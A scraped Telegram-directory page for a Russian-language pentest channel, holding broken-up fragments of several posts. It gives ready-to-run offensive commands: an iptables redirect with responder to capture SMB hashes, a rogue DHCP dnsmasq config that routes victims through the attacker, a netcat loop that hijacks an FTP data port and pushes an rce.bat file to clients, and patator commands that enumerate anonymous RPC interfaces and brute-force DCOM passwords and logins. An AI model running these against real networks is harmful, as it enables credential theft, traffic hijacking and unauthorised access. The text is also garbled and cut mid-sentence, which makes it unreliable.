
s0i37_channel
Рэйтынг TGlist
0
0
ТыпПублічны
Вертыфікацыя
Не вертыфікаваныНадзейнасць
Не надзейныРазмяшчэнне
МоваІншая
Дата стварэння каналаSep 19, 2022
Дадана ў TGlist
Feb 06, 2025Прыкрепленая група
Увайдзіце, каб разблакаваць больш функцый.
subfinder | httpx | katana
уже не заметит такие сайты.ffuf
или gobuster
(особенно после моего коммита https://github.com/OJ/gobuster/pull/249). И далее добавлять соответствие ip hostname в /etc/hosts. Но если говорить об автоматизации с этим подходом возникают сложности - при одновременном сканировании сразу множества сайтов (а на периметре их обычно десятки, сотни) наши скрипты будут мешать друг другу используя при этом единый файл hosts. Решение тут - это Linux namespace, позволяющий запустить любой процесс с персональными точками монтирования. И вот таким волшебным sheebang (https://piware.de/2012/12/running-a-script-with-unshared-mount-namespace/) в любом скрипте автоматизации #!/usr/bin/env -S sudo unshare -m sudo -u user bash
мы можем запускать проверки внося изменения в hosts локально, не мешая другим скриптам. После чего автоматизация не пройдёт мимо даже скрытого (без dns) сайта.iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-ports 445
+ responder
). sudo dnsmasq --conf-file=dnsmasq.conf -d -p0
и таким конфигом:domain=fake.net
interface=wlan0
dhcp-range=11.0.0.10,11.0.0.20,24h
dhcp-option=1,255.255.255.0
dhcp-option=3,11.0.0.1
dhcp-option=6,11.0.0.1
dhcp-option=121,0.0.0.0/1,11.0.0.1,128.0.0.0/1,11.0.0.1
dhcp-option=249,0.0.0.0/1,11.0.0.1,128.0.0.0/1,11.0.0.1
ip r a default dev tun0 table 1194
. Далее опять с помощью iptables мы помечаем все пакеты определенной группы iptables -t mangle -A OUTPUT -m owner --gid-owner 1194 -j MARK --set-mark 0x1194
. И после связываем их с маршрутом правилом - ip rule add fwmark 0x1194/0x1194 lookup 1194
. Теперь достаточно лишь сменить в консоли текущую группу (newgrp tun
) и все дальнейшие подключения пойдут в нужный нам туннель.iptables -t nat -A OUTPUT -m owner --gid-owner 3128 -p tcp -j REDIRECT --to-ports 12345
.newgrp proxy
) и весь трафик в этой сессии от любого приложения пойдёт в нужный нам прокси.getsockopt(socket.SOL_IP)
). Именно так и работает прозрачное проксирование. Оно позволяет заворачивать трафик любого (даже go и kernel) приложения куда мы захотим. С точки зрения системы этот процесс более естественный чем соксификация. Ведь для этого нам не нужно перехватывать библиотечные вызовы, а достаточно поймать уже отправленные пакеты iptables -t nat -A OUTPUT -p 80 -j REDIRECT --to-ports 12345
и направить их в нужный листенер (например redsocks). И уже redsocks в дальнейшем спроксирует подключения в socks или http прокси.while :; do nc -nv target 54321; done
то в какой то момент мы начнем получать данные вместо легитимных клиентов (Confidentiality:High). А если писать туда while :; do nc -nv target 54321 < rce.bat; done
, то соответственно записывать произвольный контент вместо клиентов (Integrity: High). Ну и всё это время сами клиенты не смогут получать доступ к серверу (Availability: High).port stealing
и была открыта ещё в прошлом тысячелетии. Защита от неё проста - сервер должен сверять IP.src. Но если перед FTP-сервером с DMZ происходит проксирование/форвард, с подменой IP.src, тогда FTP-служба видит всех клиентов как один IP и начинает путаться в сокетах, руководствуясь лишь временем подключения.patator.py dcom_login host=10.0.0.15 port=49152 uuid=FILE0 0=/tmp/uuids.txt ver=FILE1 1=/tmp/vers.txt -t 1 -x ignore:code=-1
- получаем список UUID без аутентификации.patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=367abb81-9844-35f1-ad32-98f038001003 ver=2.0 -t 1 -x ignore:code=-1
- где MS-SCMR (smbexec.py)patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=86d35949-83c9-4044-b424-db363231fd0c ver=1.0 -t 1 -x ignore:code=-1
- где MS-TSCH (atexec.py)patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=12345678-1234-abcd-ef00-0123456789ab ver=1.0 -t 1 -x ignore:code=-1
- где MS-RPRN (printerbug)patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=c681d488-d850-11d0-8c52-00c04fd90f7e ver=1.0 -t 1 -x ignore:code=-1
- где MS-EFSR (petitpotam)patator.py dcom_login host=10.0.0.15 port=49158 uuid=12345778-1234-ABCD-EF00-0123456789AB ver=0.0 opnum=FILE0 0=/tmp/opnums.txt -t 1 -x ignore:mesg=rpc_s_access_denied
- везде где вернулся rpc_x_bad_stub_data или success означает возможность вызвать RPC анонимноpatator.py dcom_login host=10.0.0.15 port=135 uuid=99fcfec4-5260-101b-bbcb-00aa0021347a ver=0.0 opnum=5
patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=admin password=FILE0 0=passwords.txt -x quit:mesg=rpc_x_bad_stub_data
patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=FILE0 password=1 0=logins.txt -x ignore:mesg='Unknown DCE RPC fault status code: 00000721'